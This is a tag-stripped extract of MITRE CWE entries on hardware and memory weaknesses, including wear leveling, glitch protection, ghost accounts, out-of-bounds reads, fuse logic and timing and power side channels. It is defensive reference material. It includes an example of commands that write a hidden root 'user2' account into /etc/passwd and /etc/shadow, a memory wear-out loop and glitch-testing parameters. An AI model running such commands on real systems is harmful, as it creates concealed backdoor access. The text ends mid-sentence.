2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The product does not implement or incorrectly implements wear leveling operations in limited-write non-volatile memories. - - Non-volatile memories such as NAND Flash, EEPROM, etc. have individually erasable segments, each of which can be put through a limited number of program/erase or write cycles. For example, the device can only endure a limited number of writes, after which the device becomes unreliable. In order to wear out the cells in a uniform manner, non-volatile memory and storage products based on the above-mentioned technologies implement a technique called wear leveling. Once a set threshold is reached, wear leveling maps writes of a logical block to a different physical block. This prevents a single physical block from prematurely failing due to a high concentration of writes. If wear leveling is improperly implemented, attackers may be able to programmatically cause the storage to become unreliable within a much shorter time than would normally be expected. - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Instability - - - - - Architecture and Design - Implementation - Testing - - Include secure wear leveling algorithms and ensure they may not be bypassed. - - High - - - - - An attacker can render a memory line unusable by repeatedly causing a write to the memory line. - Below is example code from [REF-1058] that the user can execute repeatedly to cause line failure. W is the maximum associativity of any cache in the system; S is the size of the largest cache in the system. - - Do aligned alloc of (W+1) arrays each of size S - - while(1) { - - for (ii = 0; i < W + 1; ii++) - - array[ii].element[0]++; - - - - - } - - - Without wear leveling, the above attack will be successful. Simple randomization of blocks will not suffice as instead of the original physical block, the randomized physical block will be worn out. - - Wear leveling must be used to even out writes to the device. - - - - - - - - - - - - The Technology-Class should be Memory. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Potential_Mitigations, Research_Gaps - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The device does not contain or contains incorrectly implemented circuitry or sensors to detect and mitigate voltage and clock glitches and protect sensitive information or software contained on the device. - - A device might support features such as secure boot which are supplemented with hardware and firmware support. This involves establishing a chain of trust, starting with an immutable root of trust by checking the signature of the next stage (culminating with the OS and runtime software) against a golden value before transferring control. The intermediate stages typically set up the system in a secure state by configuring several access control settings. Similarly, security logic for exercising a debug or testing interface may be implemented in hardware, firmware, or both. A device needs to guard against fault attacks such as voltage glitches and clock glitches that an attacker may employ in an attempt to compromise the system. - - - - - - - Primary - - - - - - - - - - - - - - Operation - - - - - Confidentiality - Integrity - Availability - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - - - - - Manual Analysis - - - Put the processor in an infinite - loop, which is then followed by instructions - that should not ever be executed, since the - loop is not expected to exit. After the loop, - toggle an I/O bit (for oscilloscope monitoring - purposes), print a console message, and - reenter the loop. Note that to ensure that - the loop exit is actually captured, many NOP - instructions should be coded after the loop - branch instruction and before the I/O bit - toggle and the print statement. - - Margining the clock consists of varying the clock - frequency until an anomaly occurs. This could be a - continuous frequency change or it could be a single - cycle. The single cycle method is described here. For - every 1000th clock pulse, the clock cycle is shortened by - 10 percent. If no effect is observed, the width is - shortened by 20%. This process is continued in 10% - increments up to and including 50%. Note that the cycle - time may be increased as well, down to seconds per - cycle. - - Separately, the voltage is margined. Note that - the voltage could be increased or decreased. Increasing - the voltage has limits, as the circuitry may not be able - to withstand a drastically increased voltage. This process - starts with a 5% reduction of the DC supply to the CPU - chip for 5 millisecond repeated at 1KHz. If this has no - effect, the process is repeated, but a 10% reduction is - used. This process is repeated at 10% increments down to a - 50% reduction. If no effects are observed at 5 - millisecond, the whole process is repeated using a 10 - millisecond pulse. If no effects are observed, the process - is repeated in 10 millisecond increments out to 100 - millisecond pulses. - - While these are suggested starting points for - testing circuitry for weaknesses, the limits may need to - be pushed further at the risk of device damage. See - [REF-1217] for descriptions of Smart Card attacks against - a clock (section 14.6.2) and using a voltage glitch - (section 15.5.3). - - Moderate - - - Dynamic Analysis with Manual Results Interpretation - - During the implementation phase where actual hardware is available, specialized hardware tools and apparatus such as ChipWhisperer may be used to check if the platform is indeed susceptible to voltage and clock glitching attacks. - - - - Architecture or Design Review - - Review if the protections against glitching merely transfer the attack target. For example, suppose a critical authentication routine that an attacker would want to bypass is given the protection of modifying certain artifacts from within that specific routine (so that if the routine is bypassed, one can examine the artifacts and figure out that an attack must have happened). However, if the attacker has the ability to bypass the critical authentication routine, they might also have the ability to bypass the other protection routine that checks the artifacts. Basically, depending on these kind of protections is akin to resorting to "Security by Obscurity". - - - - Architecture or Design Review - - Many SoCs come equipped with a built-in Dynamic Voltage and Frequency Scaling (DVFS) that can control the voltage and clocks via software alone. However, there have been demonstrated attacks (like Plundervolt and CLKSCREW) that target this DVFS [REF-1081] [REF-1082]. During the design and implementation phases, one needs to check if the interface to this power management feature is available from unprivileged SW (CWE-1256), which would make the attack very easy. - - - - - - Architecture and Design - Implementation - - At the circuit-level, using Tunable Replica Circuits (TRCs) or special flip-flops such as Razor flip-flops helps mitigate glitch attacks. Working at the SoC or platform base, level sensors may be implemented to detect glitches. Implementing redundancy in security-sensitive code (e.g., where checks are performed)also can help with mitigation of glitch attacks. - - - - - - Below is a representative snippet of C code that is part of the secure-boot flow. A signature of the runtime-firmware image is calculated and compared against a golden value. If the signatures match, the bootloader loads runtime firmware. If there is no match, an error halt occurs. If the underlying hardware executing this code does not contain any circuitry or sensors to detect voltage or clock glitches, an attacker might launch a fault-injection attack right when the signature check is happening (at the location marked with the comment), causing a bypass of the signature-checking process. - - ... - - if (signature_matches) // <-Glitch Here - { - load_runtime_firmware(); - } - else - { - do_not_load_runtime_firmware(); - } - - ... - - After bypassing secure boot, an attacker can gain access to system assets to which the attacker should not have access. - - If the underlying hardware detects a voltage or clock glitch, the information can be used to prevent the glitch from being successful. - - - - - - CVE-2019-17391 - Lack of anti-glitch protections allows an attacker to launch a physical attack to bypass the secure boot and read protected eFuses. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17391 - - - - Power - Clock - - - - - - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Functional_Areas - - - Parbati K. Manna - Intel Corporation - 2021-10-18 - provided detection methods - - Missing Protection Against Voltage and Clock Glitches - - - - The security-sensitive hardware module contains semiconductor defects. - - A semiconductor device can fail for various reasons. While some are manufacturing and packaging defects, the rest are due to prolonged use or usage under extreme conditions. Some mechanisms that lead to semiconductor defects include encapsulation failure, die-attach failure, wire-bond failure, bulk-silicon defects, oxide-layer faults, aluminum-metal faults (including electromigration, corrosion of aluminum, etc.), and thermal/electrical stress. These defects manifest as faults on chip-internal signals or registers, have the effect of inputs, outputs, or intermediate signals being always 0 or always 1, and do not switch as expected. If such faults occur in security-sensitive hardware modules, security guarantees offered by the device will be compromised. - - - - - - - - - - - - - Manufacturing - May be introduced due to issues in the manufacturing environment or improper handling of components, for example. - - - Operation - May be introduced by improper handling or usage outside of rated operating environments (temperature, humidity, etc.) - - - - - Availability - Access Control - DoS: Instability - - - - - Testing - - While semiconductor-manufacturing companies implement several mechanisms to continuously improve the semiconductor manufacturing process to ensure reduction of defects, some defects can only be fixed after manufacturing. Post-manufacturing testing of silicon die is critical. Fault models such as stuck-at-0 or stuck-at-1 must be used to develop post-manufacturing test cases and achieve good coverage. Once the silicon packaging is done, extensive post-silicon testing must be performed to ensure that hardware logic implementing security functionalities is defect-free. - - - - Operation - - Operating the hardware outside device specification, such as at extremely high temperatures, voltage, etc., accelerates semiconductor degradation and results in defects. When these defects manifest as faults in security-critical, hardware modules, it results in compromise of security guarantees. Thus, operating the device within the specification is important. - - - - - - The network-on-chip implements a firewall for access control to peripherals from all IP cores capable of mastering transactions. - - A manufacturing defect in this logic manifests itself as a logical fault, which always sets the output of the filter to "allow" access. - - Post-manufacture testing must be performed to ensure that hardware logic implementing security functionalities is defect-free. - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Modes_of_Introduction, Related_Attack_Patterns - - - - - The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application's model of the OS's state is inconsistent with the OS's actual state. - - Many products provide web-based applications or other software for managing the underlying operating system. This is common with cloud, network access devices, home networking, and other systems. When the management tool does not accurately represent what is in the OS - such as user accounts - then the administrator might not see suspicious activities that would be noticed otherwise. - For example, numerous systems utilize a web - front-end for administrative control. They also offer - the ability to add, alter, and drop users with various - privileges as it relates to the functionality of the - system. A potential architectural weakness may exist - where the user information reflected in the web - interface does not mirror the users in the underlying - operating system. Many web UI or REST APIs use the - underlying operating system for authentication; the - system's logic may also track an additional set of - user capabilities within configuration files - and datasets for authorization capabilities. When - there is a discrepancy between the user information in - the UI or REST API's interface system and the - underlying operating system's user listing, this may - introduce a weakness into the system. For example, if an - attacker compromises the OS and adds a new user - account - a "ghost" account - then the attacker could escape detection if - the management tool does not list the newly-added - account. - This discrepancy could be exploited in several ways: - - - A rogue admin could insert a new account into a system that will -persist if they are terminated or wish to take action on a system that -cannot be directly associated with them. - An attacker can leverage a separate command injection attack available through the web interface to insert a ghost account with shell privileges such as ssh. - An attacker can leverage existing web interface APIs, manipulated in such a way that a new user is inserted into the operating system, and the user web account is either partially created or not at all. - An attacker could create an admin - account which is viewable by an administrator, - use this account to create the ghost account, - delete logs and delete the first created admin - account. - - - Many of these attacker scenarios can be - realized by leveraging separate vulnerabilities - related to XSS, command injection, authentication - bypass, or logic flaws on the various systems. - - - - - - - - - - - - - Ghost in the Shell - - - - - Architecture and Design - The design might assume that the underlying OS does not change. - - - Implementation - Assumptions about the underlying OS might be hard-coded into the application or otherwise in external data stores in a way that is not updated when the OS's state changes. - - - - - Access Control - Varies by Context - - - Accountability - Hide Activities - - - Other - Unexpected State - - - - - Architecture and Design - - Ensure that the admin tool refreshes its model of the underlying OS on a regular basis, and note any inconsistencies with configuration files or other data sources that are expected to have the same data. - - - - - - Suppose that an attacker successfully gains root privileges on a Linux system and adds a new 'user2' account: - - echo "user2:x:0:0::/root:/" >> /etc/passwd; - echo - "user2:\$6\$IdvyrM6VJnG8Su5U\$1gmW3Nm.IO4vxTQDQ1C8urm72JCadOHZQwqiH/nRtL8dPY80xS4Ovsv5bPCMWnXKKWwmsocSWXupUf17LB3oS.:17256:0:99999:7:::" >> /etc/shadow; - - This new user2 account would not be noticed on the web interface, if the interface does not refresh its data of available users. - - It could be argued that for this specific example, an attacker with root privileges would be likely to compromise the admin tool or otherwise feed it with false data. However, this example shows how the discrepancy in critical data can help attackers to escape detection. - - - - - - - - Tony Martin - 2019-06-06 - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples - - - - - The software reads data past the end, or before the beginning, of the intended buffer. - Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. A crash can occur when the code reads a variable amount of data and assumes that a sentinel exists to stop the read operation, such as a NUL in a string. The expected sentinel might not be located in the out-of-bounds memory, causing excessive data to be read, leading to a segmentation fault or a buffer overflow. The software may modify an index or perform pointer arithmetic that references a memory location that is outside of the boundaries of the buffer. A subsequent read operation then produces undefined or unexpected results. - - - - - - - - - Primary - - - - - - - - - Implementation - - - - - Confidentiality - Read Memory - - - Confidentiality - Bypass Protection Mechanism - By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - To reduce the likelihood of introducing an out-of-bounds read, ensure that you validate and ensure correct calculations for any length argument, buffer size calculation, or offset. Be especially careful of relying on a sentinel (i.e. special character such as NUL) in untrusted inputs. - - - - Architecture and Design - Language Selection - Use a language that provides appropriate memory abstractions. - - - - - In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method - - int getValueFromArray(int *array, int len, int index) { - - int value; - - // check that the array index is less than the maximum - - - // length of the array - if (index < len) { - - - // get the value at the specified index of the array - value = array[index]; - } - // if array index is invalid then output error message - - - // and return value indicating error - else {printf("Value is: %d\n", array[index]);value = -1;} - return value; - } - - However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. - - - ... - - // check that the array index is within the correct - - - // range of values for the array - if (index >= 0 && index < len) { - ... - - - - - - CVE-2014-0160 - Chain: "Heartbleed" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 - - - CVE-2018-10887 - Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887 - - - CVE-2009-2523 - Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523 - - - CVE-2018-16069 - Chain: series of floating-point precision errors - (CWE-1339) in a web browser rendering engine causes out-of-bounds read - (CWE-125), giving access to cross-origin data - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069 - - - CVE-2004-0112 - out-of-bounds read due to improper length check - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0112 - - - CVE-2004-0183 - packet with large number of specified elements cause out-of-bounds read. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183 - - - CVE-2004-0221 - packet with large number of specified elements cause out-of-bounds read. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0221 - - - CVE-2004-0184 - out-of-bounds read, resultant from integer underflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184 - - - CVE-2004-1940 - large length value causes out-of-bounds read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1940 - - - CVE-2004-0421 - malformed image causes out-of-bounds read - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0421 - - - CVE-2008-4113 - OS kernel trusts userland-supplied length value, allowing reading of sensitive information - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 - - - - - Out-of-bounds Read - - - ARR30-C - Do not form or use out-of-bounds pointers or array subscripts - Imprecise - - - ARR38-C - Guarantee that library functions do not form invalid pointers - Imprecise - - - EXP39-C - Do not access a variable through a pointer of an incompatible type - Imprecise - - - STR31-C - Guarantee that storage for strings has sufficient space for character data and the null terminator - Imprecise - - - STR32-C - Do not pass a non-null-terminated character sequence to a library function that expects a string - CWE More Abstract - - - - - - - - - - - - Under-studied and under-reported. Most issues are probably labeled as buffer overflows. - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Observed_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Description - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Description, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-09-19 - updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Observed_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples, Relationships - - - - - The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other. - - In highly distributed environments, or on systems with distinct physical components that operate independently, there is often a need for each component to store and update its own local copy of key data such as state or cache, so that all components have the same "view" of the overall system and operate in a coordinated fashion. For example, users of a social media service or a massively multiplayer online game might be using their own personal computers while also interacting with different physical hosts in a globally distributed service, but all participants must be able to have the same "view" of the world. Alternately, a processor's Memory Management Unit (MMU) might have "shadow" MMUs to distribute its workload, and all shadow MMUs are expected to have the same accessible ranges of memory. - In such environments, it becomes critical for - the product to ensure that this "shared state" is - consistently modified across all distributed systems. - If state is not consistently maintained across all - systems, then critical transactions might take place - out of order, or some users might not get the same - data as other users. When this inconsistency affects - correctness of operations, it can introduce - vulnerabilities in mechanisms that depend on - consistent state. - - - - - - - - - - - - - - Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. - Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. - - - - - - - - Issues related to state and cache - creation, - preservation, and update - are a significant gap in - CWE that is expected to be addressed in future - versions. It likely has relationships to concurrency - and synchronization, incorrect behavior order, and - other areas that already have some coverage in CWE, - although the focus has typically been on independent - processes on the same operating system - not on - independent systems that are all a part of a larger - system-of-systems. - - - - - CWE Content Team - CWE Content Team - 2020-02-13 - - - CWE Content Team - MITRE - 2020-06-25 - updated Applicable_Platforms - - - - - The product's architecture mirrors regions without ensuring that their contents always stay in sync. - - Having mirrored regions with different values might result in the exposure of sensitive information or possibly system compromise. - In the interest of increased performance, one might need to duplicate a resource. A cache memory is a common example of this concept, which keeps a "local" copy of a data element in the high speed cache memory. Unfortunately, this speed improvement comes with a downside, since the product needs to ensure that the local copy always mirrors the original copy truthfully. If they get out of sync, the computational result is no longer true. - During hardware design, memory is not the only item which gets mirrored. There are many other entities that get mirrored, as well: registers, memory regions, and, in some cases, even whole computational units. For example, within a multi-core processor, if all memory accesses for each and every core goes through a single Memory-Management Unit (MMU) then the MMU will become a performance bottleneck. In such cases, duplicating local MMUs that will serve only a subset of the cores rather than all of them may resolve the performance issue. These local copies are also called "shadow copies" or "mirrored copies." - If the original resource never changed, local duplicate copies getting out of sync would never be an issue. However, the values of the original copy will sometimes change. When the original copy changes, the mirrored copies must also change, and change fast. - This situation of shadow-copy-possibly-out-of-sync-with-original-copy might occur as a result of multiple scenarios, including the following: - - - - - After the values in the original copy change, due to some reason the original copy does not send the "update" request to its shadow copies. - After the values in the original copy change, the original copy dutifully sends the "update" request to its shadow copies, but due to some reason the shadow copy does not "execute" this update request. - After the values in the original copy change, the original copy sends the "update" request to its shadow copies, and the shadow copy executes this update request faithfully. However, during the small time period when the original copy has "new" values and the shadow copy is still holding the "old" values, an attacker can exploit the old values. Then it becomes a race condition between the attacker and the update process of who can reach the target, shadow copy first, and, if the attacker reaches first, the attacker wins. - The attacker might send a "spoofed" update request to the target shadow copy, pretending that this update request is coming from the original copy. This spoofed request might cause the targeted shadow copy to update its values to some attacker-friendly values, while the original copies remain unchanged by the attacker. - Suppose a situation where the original copy has a system of reverting back to its original value if it does not hear back from all the shadow copies that such copies have successfully completed the update request. In such a case, an attack might occur as follows: (1) the original copy might send an update request; (2) the shadow copy updates it; (3) the shadow copy sends back the successful completion message; (4) through a separate issue, the attacker is able to intercept the shadow copy's completion message. In this case, the original copy thinks that the update did not succeed, hence it reverts to its original value. Now there is a situation where the original copy has the "old" value, and the shadow copy has the "new" value. - - - - - - - - - - - - - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Varies by Context - - - - - Architecture and Design - - Whenever there are multiple, physically different copies of the same value that might change and the process to update them is not instantaneous and atomic, it is impossible to assert that the original and shadow copies will always be in sync - there will always be a time period when they are out of sync. To mitigate the consequential risk, the recommendations essentially are: - - - - Make this out-of-sync time period as small as possible, and - Make the update process as robust as possible. - - - - - Moderate - - - - - Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. - Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. - - - - Issues related to state and cache - creation, preservation, and update - are a significant gap in CWE that is expected to be addressed in future versions. It has relationships to concurrency and synchronization, incorrect behavior order, and other areas that already have some coverage in CWE, although the focus has typically been on independent processes on the same operating system - not on independent systems that are all a part of a larger system-of-systems. - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Research_Gaps - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory. - - CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it. - - - - - - - - - - - - - - Architecture and Design - - - - - Confidentiality - Integrity - Execute Unauthorized Code or Commands - - - - - Architecture and Design - - Implement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit). - - - - Integration - - If MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation. - - - - - - MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions. - - The optional MPU is not configured. - - If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it. - - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-13 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse. - - Fuses are often used to store secret data, including security configuration data. When not blown, a fuse is considered to store a logic 0, and, when blown, it indicates a logic 1. Fuses are generally considered to be one-directional, i.e., once blown to logic 1, it cannot be reset to logic 0. However, if the logic used to determine system-security state (by leveraging the values sensed from the fuses) uses negative logic, an attacker might blow the fuse and drive the system to an insecure state. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Authorization - Bypass Protection Mechanism - Gain Privileges or Assume Identity - - - Availability - DoS: Crash, Exit, or Restart - - - Confidentiality - Read Memory - - - Integrity - Modify Memory - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Logic should be designed in a way that blown fuses do not put the product into an insecure state that can be leveraged by an attacker. - - - - - - A chip implements a secure boot and uses the sensed value of a fuse - "do_secure_boot" to determine whether to perform a secure boot or not. If this fuse - value is "0", the system performs secure boot. Otherwise, it does not perform secure - boot. - An attacker blows the "do_secure_boot" fuse to "1". After reset, the attacker loads a custom - bootloader, and, since the fuse value is now "1", the system does not perform secure boot, - and the attacker can execute their custom firmware image. - Since by default, a fuse-configuration value is a "0", an attacker can blow it to a "1" with - inexpensive hardware. - If the logic is reversed, an attacker cannot easily reset the fuse. Note that, with - specialized and expensive equipment, an attacker with full physical access might be able to "unblow" the fuse - value to a "0". - - - - - - - - - - - This entry is still under development and will continue to see updates and content improvements. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2019-10-15 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The product's comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes. - - Comparison logic is used to compare a variety of objects including passwords, Message - Authentication Codes (MACs), and responses to verification challenges. When comparison logic is - implemented at a finer granularity (e.g., byte-by-byte comparison) and breaks in the case of a - comparison failure, an attacker can exploit this implementation to identify when exactly - the failure occurred. With multiple attempts, the attacker may be able to guesses the correct - password/response to challenge and elevate their privileges. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Authorization - Bypass Protection Mechanism - - - - - Implementation - - The hardware designer should ensure that comparison logic is implemented so as to compare in one operation instead in smaller chunks. - - - - - - Consider an example hardware module that checks a user-provided password to grant access to a user. The user-provided password is compared against a golden value in a byte-by-byte manner. - - always_comb @ (posedge clk) - begin - assign check_pass[3:0] = 4’b0; - for (i = 0; i < 4; i++) begin - if (entered_pass[(i*8 – 1) : i] eq golden_pass([i*8 -1) : i]) - assign check_pass[i] = 1; - continue; - else - assign check_pass[i] = 0; - break; - end - assign grant_access = (check_pass == 4’b1111) ? 1’b1: 1’b0; - end - - Since the code breaks on an incorrect entry of password, an attacker can guess the correct password for that byte-check iteration with few repeat attempts. - - Either the comparison of the entire string should be done all at once or the attacker is not given an indication whether pass or fail happened by allowing the comparison to run through all bits before the grant_access signal is set. - - always_comb @ (posedge clk) - - begin - assign check_pass[3:0] = 4’b0; - for (i = 0; i < 4; i++) begin - if (entered_pass[(i*8 – 1) : i] eq golden_pass([i*8 -1) : i]) - assign check_pass[i] = 1; - continue; - else - assign check_pass[i] = 0; - continue; - end - assign grant_access = (check_pass == 4’b1111) ? 1’b1: 1’b0; - end - - - - - - CVE-2014-0984 - The passwordCheck function in SAP Router 721 patch 117, 720 patch 411, 710 patch 029, and earlier terminates validation of a Route Permission Table entry password upon encountering the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0984 - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - A device's real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token. - - The power consumed by a device may be instrumented and monitored in real time. If the algorithm for evaluating security tokens is not sufficiently robust, the power consumption may vary by token entry comparison against the reference value. Further, if retries are unlimited, the power difference between a "good" entry and a "bad" entry may be observed and used to determine whether each entry itself is correct thereby allowing unauthorized parties to calculate the reference value. - - - - - - - - - - - - - - Architecture and Design - The design of the algorithm itself may intrinsically allow the power side channel attack to be effective - - - Implementation - This weakness may be introduced during implementation despite a robust design that otherwise prevents exploitation - - - - - Confidentiality - Integrity - Availability - Access Control - Accountability - Authentication - Authorization - Non-Repudiation - Modify Memory - Read Memory - Read Files or Directories - Modify Files or Directories - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Read Application Data - Modify Application Data - Hide Activities - As compromising a security token may result in complete system control, the impacts are relatively universal - - - - - Architecture and Design - The design phase must consider each check of a security token against a standard and the amount of power consumed during the check of a good token versus a bad token. The alternative is an all at once check where a retry counter is incremented PRIOR to the check. - - - Architecture and Design - Another potential mitigation is to parallelize shifting of secret data (see example 2 below). Note that the wider the bus the more effective the result. - - - Architecture and Design - An additional potential mitigation is to add random data to each crypto operation then subtract it out afterwards. This is highly effective but costly in performance, area, and power consumption. It also requires a random number generator. - - - Implementation - If the architecture is unable to prevent the attack, using filtering components may reduce the 